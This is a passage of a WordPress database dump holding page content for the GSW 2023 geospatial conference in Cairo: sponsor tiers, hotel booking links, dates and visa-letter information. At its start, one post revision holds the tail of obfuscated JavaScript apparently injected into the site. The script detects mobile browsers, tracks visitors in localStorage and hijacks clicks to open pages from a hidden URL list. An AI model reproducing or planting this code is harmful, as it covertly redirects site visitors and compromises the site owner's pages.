|o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023_','','inherit','closed','closed','','3066-revision-v1','','','2023-06-25 15:42:09','2023-06-25 15:42:09','',3066,'https://gsw2023.com/?p=4816',0,'revision','',0),
(4817,4,'2023-06-25 15:43:38','2023-06-25 15:43:38','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]\n<h4 style=\"text-align: center;\"></h4>\n&nbsp;\n\n&nbsp;\n\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n&nbsp;\n\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]\n<h4 style=\"text-align: center;\"></h4>\n&nbsp;\n\n&nbsp;\n\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]\n<h4 style=\"text-align: center;\"></h4>\n&nbsp;\n\n<a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n&nbsp;\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]\n<h4 style=\"text-align: center;\"></h4>\n&nbsp;\n\n&nbsp;\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n&nbsp;\n<h3></h3>\n[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n&nbsp;\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\n\n&nbsp;\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\n\n&nbsp;\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\n<ul>\n 	<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n 	<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n 	<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" 